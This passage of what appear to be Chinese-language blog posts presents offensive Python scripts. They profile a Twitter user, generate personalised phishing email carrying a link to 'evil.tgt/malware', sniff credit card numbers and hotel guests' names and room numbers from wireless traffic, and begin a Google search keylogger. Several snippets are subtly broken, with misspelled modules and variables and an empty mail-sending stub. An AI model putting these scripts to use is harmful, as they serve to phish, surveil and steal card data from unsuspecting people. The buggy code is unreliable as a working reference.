        <span class="n">text</span> <span class="o">=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">'(http.*?)\Z|(http.*?) '</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
           	<span class="k">elif</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
			<span class="k">else</span><span class="p">:</span>
                <span class="k">continue</span>
            <span class="k">try</span><span class="p">:</span>
                <span class="n">response</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
                <span class="n">full_link</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">url</span>
                <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">full_link</span><span class="p">)</span>
            <span class="k">except</span><span class="p">:</span>
                <span class="k">pass</span>
       	<span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(@\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
    	<span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(#\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
	<span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
    <span class="k">return</span> <span class="n">interests</span>
</code></pre></div></div>

<p>由于推文的字数限制，大多数 URL 会使用各个服务商提供的短网址。这些链接里没什么信息量，因为他们可以指向任何地址。为了把短网址转成正常的 URL，可以用 urllib2 打开它们，在脚本打开页面后，urllib 可以获取到完整的 URL</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_interests</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
    <span class="k">for</span> <span class="n">tweet</span> <span class="ow">in</span> <span class="bp">self</span><span class="p">.</span><span class="n">tweets</span><span class="p">:</span>
        <span class="n">text</span> <span class="o">=</span> <span class="n">tweet</span><span class="p">[</span><span class="s">"tweet"</span><span class="p">]</span>
        <span class="n">links</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(http.*?)\Z|(http.*?) "</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">link</span> <span class="ow">in</span> <span class="n">links</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="k">elif</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span>
                <span class="n">link</span> <span class="o">=</span> <span class="n">link</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
			<span class="k">else</span><span class="p">:</span>
                <span class="k">continue</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">response</span> <span class="o">=</span> <span class="n">urllib2</span><span class="p">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">link</span><span class="p">)</span>
            <span class="n">full_link</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">url</span>
			<span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">full_link</span><span class="p">)</span>
		<span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(@\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">+=</span> <span class="n">re</span><span class="p">.</span><span class="nb">compile</span><span class="p">(</span><span class="s">"(#\w+)"</span><span class="p">).</span><span class="n">findall</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
        <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">].</span><span class="n">sort</span><span class="p">()</span>
   	<span class="k">return</span> <span class="n">interests</span>
</code></pre></div></div>

<h2 id="匿名电子邮件">匿名电子邮件</h2>

<p>相对于获取一个永久性电子邮箱，使用一次性电子邮箱也是另一个很好的选项。Ten Minute Mail 提供的就是这样一种一次性电子邮箱。攻击者可以使用这种很难被追踪的电子邮件账户去创建社交网站账号。</p>

<h2 id="批量社工">批量社工</h2>

<h3 id="使用-smtplib-给目标对象发邮件">使用 smtplib 给目标对象发邮件</h3>

<p>正常发送邮件的过程包括打开邮件客户端，单击相应的选项，然后单击新建，最后单击发送。在电脑屏幕后，邮件客户端程序会连接到服务器，有时还需要登录，并提交详细的信息——发件人、收件人和其他必要的数据。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">smtplib</span>
<span class="kn">from</span> <span class="nn">email.mime.text</span> <span class="kn">import</span> <span class="n">MIMEText</span>
<span class="k">def</span> <span class="nf">send_mail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">subject</span><span class="p">,</span> <span class="n">text</span><span class="p">):</span>
    <span class="n">msg</span> <span class="o">=</span> <span class="n">MIMEText</span><span class="p">(</span><span class="n">text</span><span class="p">)</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"From"</span><span class="p">]</span> <span class="o">=</span> <span class="n">user</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"To"</span><span class="p">]</span> <span class="o">=</span> <span class="n">to</span>
    <span class="n">msg</span><span class="p">[</span><span class="s">"Subject"</span><span class="p">]</span> <span class="o">=</span> <span class="n">subject</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">smtp_server</span> <span class="o">=</span> <span class="n">smptlib</span><span class="p">.</span><span class="n">SMTP</span><span class="p">(</span><span class="s">"smtp.gmail.com"</span><span class="p">,</span> <span class="mi">587</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Connecting To Mail Server."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">ehlo</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Starting Encrypted Session."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">starttls</span><span class="p">()</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">ehlo</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Logging Into Mail Server."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">login</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Seding Mail."</span><span class="p">)</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">sendmail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">to</span><span class="p">,</span> <span class="n">msg</span><span class="p">.</span><span class="n">as_string</span><span class="p">())</span>
        <span class="n">smtp_server</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Mail Sent Successfully."</span><span class="p">)</span>
 	<span class="k">except</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Seding Mail Failed."</span><span class="p">)</span>
        
<span class="n">user</span> <span class="o">=</span> <span class="s">"username"</span>
<span class="n">pwd</span> <span class="o">=</span> <span class="s">"password"</span>
<span class="n">send_mail</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="s">"target@target.target"</span><span class="p">,</span> <span class="s">"Re: Important"</span><span class="p">,</span> <span class="s">"Test Message"</span><span class="p">)</span>
</code></pre></div></div>

<p>不过许多电子邮件服务器是不允许转发邮件的，所以只能将邮件传递到指定的地址。本地电子邮件服务器可以被设为允许转发邮件，或允许转发来自网上的邮件，这是它会把来自任意地址的电子邮件转发的任意地址中——即使邮件地址的格式都不对也没关系。伪造发信地址是关键，使用邮件客户端脚本，再加上一个允许转发邮件的服务器。</p>

<h3 id="用-smtplib-进行网络钓鱼">用 smtplib 进行网络钓鱼</h3>

<p>为了降低被识破的概率，只生成一段非常简单的含有恶意代码的文本，把它作为邮件的正文。程序会根据它所拥有的数据，随机生成文本。具体步骤是：选择一个虚拟的发信人电子邮箱地址，指定一个主题，生成正文文本，然后发送电子邮件。</p>

<p>脚本利用目标对象留在 Twitter 中可以公开访问的信息对他进行攻击。根据它会找到关于目标对象的地理位置信息、@过的用户、hash 标签以及链接，脚本就会生成和发送一个带有恶意链接的电子邮件，等待目标对象去点击。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">smtplib</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">from</span> <span class="nn">email.mime.text</span> <span class="kn">import</span> <span class="n">MIMEText</span>
<span class="kn">from</span> <span class="nn">twitterCLass</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">random</span> <span class="kn">import</span> <span class="n">choice</span>
<span class="k">def</span> <span class="nf">send_main</span><span class="p">():</span>
    <span class="k">pass</span>
    
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage%prog -u&lt;twitter target&gt; -t&lt;target email&gt; -l &lt;gmail login&gt; -p &lt;gmail password&gt;"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-u"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"handle"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify twitter handle"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-t"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"tgt"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target email"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-l"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"user"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify gmail login"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"pwd"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="s">"string"</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"speicfy gmail password"</span><span class="p">)</span>
    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>
    <span class="n">handle</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">handle</span>
    <span class="n">tgt</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">tgt</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">user</span>
    <span class="n">pwd</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">pwd</span>
    <span class="k">if</span> <span class="n">handle</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">tgt</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">user</span> <span class="o">==</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">pwd</span> <span class="o">==</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching tweets from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">spam_tgt</span> <span class="o">=</span> <span class="n">ReconPerson</span><span class="p">(</span><span class="n">handle</span><span class="p">)</span>
    <span class="n">spam_tgt</span><span class="p">.</span><span class="n">get_tweets</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching interests from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">interests</span> <span class="o">=</span> <span class="n">spam_tgt</span><span class="p">.</span><span class="n">find_interests</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Fetching location information from: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">handle</span><span class="p">))</span>
    <span class="n">location</span> <span class="o">=</span> <span class="n">spam_tgt</span><span class="p">.</span><span class="n">twitter_locate</span><span class="p">(</span><span class="s">"mlb-cities.txt"</span><span class="p">)</span>
    <span class="n">spam_msg</span> <span class="o">=</span> <span class="s">"Dear {},"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tgt</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">location</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_loc</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">location</span><span class="p">)</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Its me from {}."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_loc</span><span class="p">)</span>
	<span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_user</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"users"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" {} said to say hello."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_user</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_hash</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"hashtags"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Did you see all the fuss about {}?"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">randHash</span><span class="p">)</span>
	<span class="k">if</span> <span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">]</span> <span class="o">!=</span> <span class="bp">None</span><span class="p">:</span>
        <span class="n">rand_link</span> <span class="o">=</span> <span class="n">choice</span><span class="p">(</span><span class="n">interests</span><span class="p">[</span><span class="s">"links"</span><span class="p">])</span>
        <span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" I really liked your link to: {}."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">rand_link</span><span class="p">)</span>
	<span class="n">spam_msg</span> <span class="o">+=</span> <span class="s">" Check out my link to http://evil.tgt/malware"</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Sending Msg: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">spam_msg</span><span class="p">))</span>
    <span class="n">send_main</span><span class="p">(</span><span class="n">user</span><span class="p">,</span> <span class="n">pwd</span><span class="p">,</span> <span class="n">tgt</span><span class="p">,</span> <span class="s">"Re: Important"</span><span class="p">,</span> <span class="n">spam_msg</span><span class="p">)</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><category term="network" /><summary type="html"><![CDATA[用 Python 刺探网络]]></summary></entry><entry><title type="html">Wireless Network Attacks Using Python</title><link href="https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python/" rel="alternate" type="text/html" title="Wireless Network Attacks Using Python" /><published>2024-10-05T00:00:00+00:00</published><updated>2024-10-05T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/10/Wireless%20Network%20Attacks%20Using%20Python/"><![CDATA[<h2 id="用-python-进行无线网络攻击">用 Python 进行无线网络攻击</h2>

<h2 id="搭建无线网络攻击环境">搭建无线网络攻击环境</h2>

<p>Backtrack 5 上的默认驱动程序能让用户把网卡设为混杂模式（monitor mode），并直接发送数据链路层上的帧。另外，它还有一个额外的无线插口，能让我们在网卡上再插上一个大功率天线。</p>

<p>混杂模式允许你直接拿到数据链路层上的无线网络数据帧，而不是以管理模式进入后获得的 <code class="language-plaintext highlighter-rouge">802.11</code> 以太网数据帧。这样，即使是在没有连上某个网络的情况下，也能看到 Beacons（信标）数据帧和无线网络管理数据帧的数据。</p>

<h3 id="用-scapy-测试无线网卡的嗅探功能">用 Scapy 测试无线网卡的嗅探功能</h3>

<p>使用 <code class="language-plaintext highlighter-rouge">aircrack-ng</code> 工具包把网卡设为混杂模式。先用 Iwconif 列出无线网卡 wlan0 的相关信息。然后用 <code class="language-plaintext highlighter-rouge">airmon-ng start wlan0</code> 命令把网卡设为混杂模式</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># iwconfig wlan0</span>
</code></pre></div></div>

<p>把变量 <code class="language-plaintext highlighter-rouge">conf.iface</code> 设为新创建的嗅探用网卡，每监听到一个数据包，脚本就会运行 <code class="language-plaintext highlighter-rouge">pkt_print</code> 函数。如果这个数据包是 <code class="language-plaintext highlighter-rouge">802.11</code> 信标，<code class="language-plaintext highlighter-rouge">802.11</code> 探查响应、TCP 数据包、DNS 流量等</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">pkt_print</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected 802.11 Beacon Frame"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected 802.11 Probe Request Frame"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">TCP</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected a TCP Packet"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNS</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected a DNS Packet"</span><span class="p">)</span>
        
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">pkt_print</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="安装-python-蓝牙包">安装 Python 蓝牙包</h3>

<p>使用 Python 中集成的 Linux Bluez 应用程序编程接口（API）以及 obexftp API（ObexFTP 是一个基于 OBEX 协议的 FTP 客户端软件。OBEX 的全称为 Object Exchange-对象交换，所以称之为对象交换协议。）</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># sudo apt-get install python-bluez bluetooth python-obexftp</span>
</code></pre></div></div>

<p>另外还需要有一个蓝牙设备。大部分使用 Cambridge Silicon Radio（CSR）公司出品的芯片组的蓝牙设备都能在 Linux 系统下正常工作。可以使用 <code class="language-plaintext highlighter-rouge">hciconfig config</code> 命令把蓝牙设备的详细配置信息打印在屏幕上</p>

<p>Backtrack5 r1 上有一个小瑕疵——在这个已经编译好的内核中，没有可以用来直接发送数据链路层上的蓝牙数据包的内核模块。所以需要升级或者使用 Backtrack5 r2</p>

<h2 id="绵羊墙-被动窃听无线网络中传输的秘密">绵羊墙-被动窃听无线网络中传输的秘密</h2>

<h3 id="使用-python-正则表达式嗅探信用卡信息">使用 Python 正则表达式嗅探信用卡信息</h3>

<p>最常用的三种信用卡：Visa、MasterCard 和 American Express，登录 <code class="language-plaintext highlighter-rouge">http://www.regular-expressions.info/creditcard.html</code>，其中会提供其他银行的信用卡卡号的正则表达式。</p>

<p>American Express 信用卡由 34 或者 37 开头的 15 位数字组成。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">find_credit_card</span><span class="p">(</span><span class="n">raw</span><span class="p">):</span>
    <span class="n">america_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"3[47][0-9]{13}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">america_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found American Express Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">america_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">tests</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">tests</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">"I would like to buy 1337 copies of that dvd"</span><span class="p">)</span>
    <span class="n">tests</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">"Bill my card: 378282246310005 for \$2600"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">test</span> <span class="ow">in</span> <span class="n">tests</span><span class="p">:</span>
        <span class="n">fiind_credit_card</span><span class="p">(</span><span class="n">test</span><span class="p">)</span>
</code></pre></div></div>

<p>类似地可以写出 MasterCards 和 Visa 信用卡卡号的正则表达式</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_credit_card</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">america_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"3[47][0-9]{13}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">master_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"5[1-5][0-9]{14}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">visa_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"4[0-9]{12}(?:[0-9]{3})?"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">america_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found American Express Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">america_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">if</span> <span class="n">master_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found MasterCard Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">master_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">if</span> <span class="n">visa_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Visa Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">visa_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>

<h3 id="嗅探宾馆住客">嗅探宾馆住客</h3>

<p>使用 Python 来截取酒店里其它住客的信息。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="k">try</span><span class="p">:</span>
	<span class="k">print</span><span class="p">(</span><span class="s">"[*] Starting Hotel Guest Sniffer."</span><span class="p">)</span>
    <span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">find_guest</span><span class="p">,</span> <span class="n">store</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>接下来构造正则表达式匹配所有以 <code class="language-plaintext highlighter-rouge">LAST_NAME</code> 开头，并以 <code class="language-plaintext highlighter-rouge">&amp;</code> 结尾的字符串，这是宾馆住客房间号的正则表达式。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_guest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">name</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)Last_NAME=(.*)&amp;"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">room</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)ROOM_NUMBER=(.*)'"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">name</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Hotel Guest {}, Room #"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">root</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>

<h3 id="编写谷歌键盘记录器">编写谷歌键盘记录器</h3>

<p>在搜索栏里每输入一个字符时，浏览器几乎都会向谷歌发送一个 HTTP GET。</p>

<p>谷歌搜索的 URL 中的参数提供了大量附加信息，这些信息对编写谷歌键盘记录器是相当有用的。</p>

<table>
  <thead>
    <tr>
      <th>参数</th>
      <th>含义</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>q=</td>
      <td>查询的内容，就是在搜索框里输入的内容</td>
